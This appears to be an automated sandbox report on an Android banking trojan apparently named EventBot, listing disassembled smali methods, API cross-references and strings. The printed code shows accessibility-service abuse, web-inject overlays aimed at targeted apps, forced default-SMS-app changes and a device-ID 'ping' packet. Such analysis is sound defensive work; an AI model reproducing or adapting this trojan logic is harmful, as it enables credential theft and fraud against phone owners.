                        15const-string v1, ".*)\" }, \"isNext\" : true }], \"once\" : true, \"debug\" : false } }"
                        17invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18move-result-object v0
                        20invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        21move-result-object v0
                        22new-instance v1, Landroid/content/Intent;
                        24const-string v2, "android.provider.Telephony.ACTION_CHANGE_DEFAULT"
                        26invoke-direct {v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
                        28const-string v2, "package"
                        30invoke-virtual {v1, v2, p2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        31const/high16 v2, 0x10000000
                        33invoke-virtual {v1, v2}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
                        35invoke-virtual {p1, v1}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        37iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        39invoke-virtual {p0, p1, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        40move-result v1
                        41if-eqz v1, :cond_40
                        42const-wide/16 v2, 0x4
                        44invoke-static {v2, v3}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        45move-result-object v1
                        47invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->allowSmsAdmin(Landroid/content/Context;Ljava/lang/Long;Ljava/lang/String;)Z
                        48cond_40: return-void
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • reason
                        • ping
                        • data
                        • [func] [makePingPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        8const-string v2, "UID"
                        10invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v3
                        13invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        15const-string v2, "reason"
                        17const-string v3, "ping"
                        19invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        21const-string v2, "data"
                        23invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        24goto_1f: return-object v0
                        25catch_20: move-exception v0
                        26new-instance v1, Ljava/lang/StringBuilder;
                        28invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        30const-string v2, "[func] [makePingPacket] T: "
                        32invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v1
                        35invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        36move-result-object v0
                        38invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v0
                        41invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        42const/4 v0, 0x0
                        43goto/16 :goto_1f
                        APIs
                        • com.example.eventbot.events.TAG:Ljava/lang/String
                        • android.util.Log.v
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.events.a11yService:Landroid/accessibilityservice/AccessibilityService
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.events.setServiceInfo
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.acquire
                        • com.example.eventbot.service.<init>
                        • com.example.eventbot.service.loadLib
                        • com.example.eventbot.events.FuncLocal:Lcom/libInterface
                        • com.example.eventbot.events.FuncLocal:Lcom/libInterface
                        • com.example.eventbot.events.FuncLocal:Lcom/libInterface
                        • com.example.eventbot.events.setServiceInfo
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.service.loadLibMutex:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.events.context:Landroid/content/Context
                        • android.content.Intent.<init>
                        • android.content.Context.startService
                        Strings
                        • ***** [a11y] [func] onServiceConnected
                        • [func] [a11y] onServiceConnected and Func loaded
                        • [func] [a11y] [FuncLocal] onServiceConnected and FuncLocal loaded
                        Position Instruction Meta Information
                        1sget-object v0, Lcom/example/eventbot/events;->TAG:Ljava/lang/String;
                        3const-string v1, "***** [a11y] [func] onServiceConnected"
                        5invoke-static {v0, v1}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        6sput-object p0, Lcom/example/eventbot/events;->context:Landroid/content/Context;
                        7sput-object p0, Lcom/example/eventbot/events;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        9sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        10if-eqz v0, :cond_39
                        12sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        14const-string v1, "[func] [a11y] onServiceConnected and Func loaded"
                        16invoke-interface {v0, v1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        18sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        20invoke-interface {v0, p0}, Lcom/libInterface;->minimizeAll(Landroid/content/Context;)V
                        22sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        24invoke-interface {v0}, Lcom/libInterface;->getInjectEventQueue()Ljava/util/concurrent/BlockingQueue;
                        25move-result-object v0
                        26sput-object v0, Lcom/example/eventbot/events;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        28sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        30sget-object v1, Lcom/example/eventbot/events;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        32invoke-interface {v0, v1}, Lcom/libInterface;->setA11yService(Landroid/accessibilityservice/AccessibilityService;)V
                        34sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        36invoke-interface {v0}, Lcom/libInterface;->makeA11yServiceInfo()Landroid/accessibilityservice/AccessibilityServiceInfo;
                        37move-result-object v0
                        39invoke-virtual {p0, v0}, Lcom/example/eventbot/events;->setServiceInfo(Landroid/accessibilityservice/AccessibilityServiceInfo;)V
                        41sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        43invoke-interface {v0}, Lcom/libInterface;->doAutorun()V
                        44goto/16 :goto_6e
                        45cond_39:
                        46sget-object v0, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        48invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        49try_start_3e: new-instance v0, Lcom/example/eventbot/service;
                        51invoke-direct {v0}, Lcom/example/eventbot/service;-><init>()V
                        52const/4 v1, 0x2
                        53const/4 v2, 0x0
                        55invoke-virtual {v0, p0, v1, v2}, Lcom/example/eventbot/service;->loadLib(Landroid/content/Context;IZ)Lcom/libInterface;
                        56move-result-object v0
                        57sput-object v0, Lcom/example/eventbot/events;->FuncLocal:Lcom/libInterface;
                        59sget-object v0, Lcom/example/eventbot/events;->FuncLocal:Lcom/libInterface;
                        61const-string v1, "[func] [a11y] [FuncLocal] onServiceConnected and FuncLocal loaded"
                        63invoke-interface {v0, v1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        65sget-object v0, Lcom/example/eventbot/events;->FuncLocal:Lcom/libInterface;
                        67invoke-interface {v0, p0}, Lcom/libInterface;->minimizeAll(Landroid/content/Context;)V
                        69sget-object v0, Lcom/example/eventbot/events;->FuncLocal:Lcom/libInterface;
                        71invoke-interface {v0}, Lcom/libInterface;->makeA11yServiceInfo()Landroid/accessibilityservice/AccessibilityServiceInfo;
                        72move-result-object v0
                        74invoke-virtual {p0, v0}, Lcom/example/eventbot/events;->setServiceInfo(Landroid/accessibilityservice/AccessibilityServiceInfo;)V
                        75try_end_60:
                        76sget-object v0, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        78invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        79goto/16 :goto_6e
                        80catchall_66: move-exception v0
                        82sget-object v1, Lcom/example/eventbot/service;->loadLibMutex:Ljava/util/concurrent/Semaphore;
                        84invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        85throw v0
                        86catchall_6d: nop
                        87goto_6e: sget-boolean v0, Lcom/example/eventbot/service;->isRunning:Z
                        88if-nez v0, :cond_7e
                        90sget-object v0, Lcom/example/eventbot/events;->context:Landroid/content/Context;
                        91new-instance v1, Landroid/content/Intent;
                        92const-class v2, Lcom/example/eventbot/service;
                        94invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        96invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        97cond_7e: return-void
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • webInjPrefs
                        • [func] [doWebInject] makeWebInjectUrl:
                        • [func] [doWebInject] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-virtual {p3}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        4move-result-object v1
                        6invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        7move-result-object v1
                        9const-string v2, "webInjPrefs"
                        11invoke-virtual {p0, p1, v2, v1}, Lcom/lib;->isNeedWebInj(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        12move-result v2
                        13if-eqz v2, :cond_35
                        14iput-object v1, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        15new-instance v2, Ljava/lang/StringBuilder;
                        17invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        19const-string v3, "[func] [doWebInject] makeWebInjectUrl: "
                        21invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        22move-result-object v2
                        24invoke-virtual {p0, p1, v1, p4}, Lcom/lib;->makeWebInjectUrl(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        25move-result-object v3
                        27invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28move-result-object v2
                        30invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        31move-result-object v2
                        33invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        35invoke-virtual {p0, p1, v1, p4}, Lcom/lib;->makeWebInjectUrl(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        36move-result-object v1
                        38invoke-virtual {p0, p1, v1, p4}, Lcom/lib;->showWebInject(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        39try_end_34: move-result v0
                        40goto_35: return v0
                        41catch_36: move-exception v1
                        42new-instance v2, Ljava/lang/StringBuilder;
                        44invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        46const-string v3, "[func] [doWebInject] T: "
                        48invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49move-result-object v2
                        51invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        52move-result-object v1
                        54invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        55move-result-object v1
                        57invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        58goto/16 :goto_35
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [writeSystemSmsApp] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14sget-object v2, Lcom/lib;->STRINGS_DEFAULT:Ljava/lang/String;
                        16invoke-interface {v1, v2, p3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
                        18invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        19try_end_17: move-result v0
                        20try_start_18:
                        21sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        23invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        24try_end_1d: return v0
                        25catch_1e: move-exception v1
                        26try_start_1f: new-instance v2, Ljava/lang/StringBuilder;
                        28invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        30const-string v3, "[func] [writeSystemSmsApp] T: "
                        32invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v2
                        35invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        36move-result-object v1
                        38invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v1
                        41invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        42try_end_35:
                        43sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        45invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        46goto/16 :goto_1d
                        47catch_3b: move-exception v1
                        48goto/16 :goto_1d
                        49catchall_3d: move-exception v1
                        51sget-object v2, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        53invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        54throw v1
                        Cross References
                        APIs
                        • java.lang.String.isEmpty
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.toLowerCase
                        • java.lang.String.equals
                        • java.lang.String.isEmpty
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.eventTypeToString
                        • java.lang.String.toString
                        • java.lang.String.toLowerCase
                        • java.lang.String.toLowerCase
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.lang.Object.toString
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x1
                        2const/4 v2, 0x0
                        3sget-boolean v0, Lcom/lib;->isCheckError:Z
                        4if-eqz v0, :cond_5a
                        6sget-object v0, Lcom/lib;->errorClass:Ljava/lang/String;
                        8invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
                        9move-result v0
                        10if-nez v0, :cond_5d
                        12invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        13move-result-object v0
                        15invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        16move-result-object v0
                        18invoke-virtual {v0}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        19move-result-object v0
                        21sget-object v3, Lcom/lib;->errorClass:Ljava/lang/String;
                        23invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        24move-result v0
                        25if-eqz v0, :cond_5d
                        26move v0, v1
                        27goto_23:
                        28sget-object v3, Lcom/lib;->errorType:Ljava/lang/String;
                        30invoke-virtual {v3}, Ljava/lang/String;->isEmpty()Z
                        31move-result v3
                        32if-nez v3, :cond_5b
                        34invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        35move-result v0
                        37invoke-static {v0}, Landroid/view/accessibility/AccessibilityEvent;->eventTypeToString(I)Ljava/lang/String;
                        38move-result-object v0
                        40invoke-virtual {v0}, Ljava/lang/String;->toString()Ljava/lang/String;
                        41move-result-object v0
                        43invoke-virtual {v0}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        44move-result-object v0
                        46sget-object v3, Lcom/lib;->errorType:Ljava/lang/String;
                        48invoke-virtual {v3}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        49move-result-object v3
                        51invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        52move-result v0
                        53if-eqz v0, :cond_48
                        54move v2, v1
                        55cond_48: if-eqz v2, :cond_5a
                        57invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        58move-result-object v0
                        59if-eqz v0, :cond_5a
                        61invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        62move-result-object v0
                        64invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        65move-result-object v0
                        66sput-object v0, Lcom/lib;->errorMsg:Ljava/lang/String;
                        67cond_5a: return v2
                        68cond_5b: move v2, v0
                        69goto/16 :goto_48
                        70cond_5d: move v0, v2
                        71goto/16 :goto_23
                        APIs
                        • java.util.ArrayList.<init>
                        • com.example.eventbot.MainActivity.hexStringToByteArray
                        • java.security.SecureRandom.<init>
                        • java.security.SecureRandom.nextBytes
                        • java.lang.StringBuilder.<init>
                        • com.example.eventbot.MainActivity.bytesToHex
                        • java.lang.StringBuilder.append
                        • com.example.eventbot.MainActivity.bytesToHex
                        • java.lang.StringBuilder.append
                        • com.example.eventbot.MainActivity.bytesToHex
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.MainActivity.sha256
                        • java.util.List.add
                        • java.util.List.add
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4")",
                        5"Ljava/util/List<",
                        6"[B>;"
                        7}
                        8.end annotation
                        9new-instance v0, Ljava/util/ArrayList;
                        11invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        12const/16 v1, 0x20
                        13new-array v2, v1, [B
                        15invoke-virtual {p0, p1}, Lcom/example/eventbot/MainActivity;->hexStringToByteArray(Ljava/lang/String;)[B
                        16move-result-object p1
                        17new-array v3, v1, [B
                        18new-array v4, v1, [B
                        19new-array v1, v1, [B
                        20new-instance v5, Ljava/security/SecureRandom;
                        22invoke-direct {v5}, Ljava/security/SecureRandom;-><init>()V
                        24invoke-virtual {v5, v4}, Ljava/security/SecureRandom;->nextBytes([B)V
                        25new-instance v5, Lcom/example/eventbot/MainActivity$Curve25519;
                        27invoke-direct {v5, p0}, Lcom/example/eventbot/MainActivity$Curve25519;-><init>(Lcom/example/eventbot/MainActivity;)V
                        29invoke-virtual {v5, v3, v1, v4}, Lcom/example/eventbot/MainActivity$Curve25519;->keygen([B[B[B)V
                        31invoke-virtual {v5, v2, v4, p1}, Lcom/example/eventbot/MainActivity$Curve25519;->curve([B[B[B)V
                        32new-instance v1, Ljava/lang/StringBuilder;
                        34invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        36invoke-virtual {p0, v2}, Lcom/example/eventbot/MainActivity;->bytesToHex([B)Ljava/lang/String;
                        37move-result-object v2
                        39invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41invoke-virtual {p0, p1}, Lcom/example/eventbot/MainActivity;->bytesToHex([B)Ljava/lang/String;
                        42move-result-object p1
                        44invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46invoke-virtual {p0, v3}, Lcom/example/eventbot/MainActivity;->bytesToHex([B)Ljava/lang/String;
                        47move-result-object p1
                        49invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        52move-result-object p1
                        54invoke-virtual {p0, p1}, Lcom/example/eventbot/MainActivity;->sha256(Ljava/lang/String;)[B
                        55move-result-object p1
                        57invoke-interface {v0, p1}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        59invoke-interface {v0, v3}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        60return-object v0
                        Cross References
                        APIs
                        • java.lang.Boolean.booleanValue
                        • java.lang.Double.doubleValue
                        • java.lang.Integer.intValue
                        • java.lang.Long.longValue
                        • java.lang.Float.floatValue
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Object.getClass
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • Unsupported type
                        Position Instruction Meta Information
                        0if-nez p1, :cond_8
                        1const/4 p1, 0x0
                        3invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        4goto/16 :goto_ea
                        5cond_8: instance-of v0, p1, Landroid/os/Bundle;
                        6if-eqz v0, :cond_17
                        7const/4 v0, 0x1
                        9invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        10check-cast p1, Landroid/os/Bundle;
                        12invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeBundle(Landroid/os/Bundle;)V
                        13goto/16 :goto_ea
                        14cond_17: instance-of v0, p1, Ljava/lang/String;
                        15if-eqz v0, :cond_26
                        16const/4 v0, 0x3
                        18invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        19check-cast p1, Ljava/lang/String;
                        21invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeString(Ljava/lang/String;)V
                        22goto/16 :goto_ea
                        23cond_26: instance-of v0, p1, [Ljava/lang/String;
                        24if-eqz v0, :cond_37
                        25const/4 v0, 0x4
                        27invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        28check-cast p1, [Ljava/lang/String;
                        29check-cast p1, [Ljava/lang/String;
                        31invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeArray([Ljava/lang/Object;)V
                        32goto/16 :goto_ea
                        33cond_37: instance-of v0, p1, Ljava/lang/Boolean;
                        34if-eqz v0, :cond_4a
                        35const/4 v0, 0x5
                        37invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        38check-cast p1, Ljava/lang/Boolean;
                        40invoke-virtual {p1}, Ljava/lang/Boolean;->booleanValue()Z
                        41move-result p1
                        43invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeBoolean(Z)V
                        44goto/16 :goto_ea
                        45cond_4a: instance-of v0, p1, [Z
                        46if-eqz v0, :cond_5b
                        47const/4 v0, 0x6
                        49invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        50check-cast p1, [Z
                        51check-cast p1, [Z
                        53invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeBooleanArray([Z)V
                        54goto/16 :goto_ea
                        55cond_5b: instance-of v0, p1, Ljava/lang/Double;
                        56if-eqz v0, :cond_6e
                        57const/4 v0, 0x7
                        59invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        60check-cast p1, Ljava/lang/Double;
                        62invoke-virtual {p1}, Ljava/lang/Double;->doubleValue()D
                        63move-result-wide v0
                        65invoke-virtual {p0, v0, v1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeDouble(D)V
                        66goto/16 :goto_ea
                        67cond_6e: instance-of v0, p1, [D
                        68if-eqz v0, :cond_7f
                        69const/16 v0, 0x8
                        71invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        72check-cast p1, [D
                        73check-cast p1, [D
                        75invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeDoubleArray([D)V
                        76goto/16 :goto_ea
                        77cond_7f: instance-of v0, p1, Ljava/lang/Integer;
                        78if-eqz v0, :cond_92
                        79const/16 v0, 0x9
                        81invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        82check-cast p1, Ljava/lang/Integer;
                        84invoke-virtual {p1}, Ljava/lang/Integer;->intValue()I
                        85move-result p1
                        87invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        88goto/16 :goto_ea
                        89cond_92: instance-of v0, p1, [I
                        90if-eqz v0, :cond_a3
                        91const/16 v0, 0xa
                        93invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        94check-cast p1, [I
                        95check-cast p1, [I
                        97invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeIntArray([I)V
                        98goto/16 :goto_ea
                        99cond_a3: instance-of v0, p1, Ljava/lang/Long;
                        100if-eqz v0, :cond_b6
                        101const/16 v0, 0xb
                        103invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        104check-cast p1, Ljava/lang/Long;
                        106invoke-virtual {p1}, Ljava/lang/Long;->longValue()J
                        107move-result-wide v0
                        109invoke-virtual {p0, v0, v1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeLong(J)V
                        110goto/16 :goto_ea
                        111cond_b6: instance-of v0, p1, [J
                        112if-eqz v0, :cond_c7
                        113const/16 v0, 0xc
                        115invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        116check-cast p1, [J
                        117check-cast p1, [J
                        119invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeLongArray([J)V
                        120goto/16 :goto_ea
                        121cond_c7: instance-of v0, p1, Ljava/lang/Float;
                        122if-eqz v0, :cond_da
                        123const/16 v0, 0xd
                        125invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        126check-cast p1, Ljava/lang/Float;
                        128invoke-virtual {p1}, Ljava/lang/Float;->floatValue()F
                        129move-result p1
                        131invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeFloat(F)V
                        132goto/16 :goto_ea
                        133cond_da: instance-of v0, p1, [F
                        134if-eqz v0, :cond_eb
                        135const/16 v0, 0xe
                        137invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelStream;->writeInt(I)V
                        138check-cast p1, [F
                        139check-cast p1, [F
                        141invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->writeFloatArray([F)V
                        142goto_ea: return-void
                        143cond_eb: new-instance v0, Ljava/lang/IllegalArgumentException;
                        144new-instance v1, Ljava/lang/StringBuilder;
                        146invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        148const-string v2, "Unsupported type "
                        150invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        152invoke-virtual {p1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        153move-result-object p1
                        155invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        157invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        158move-result-object p1
                        160invoke-direct {v0, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        161throw v0
                        APIs
                        • java.lang.Integer.valueOf
                        • java.lang.Thread.sleep
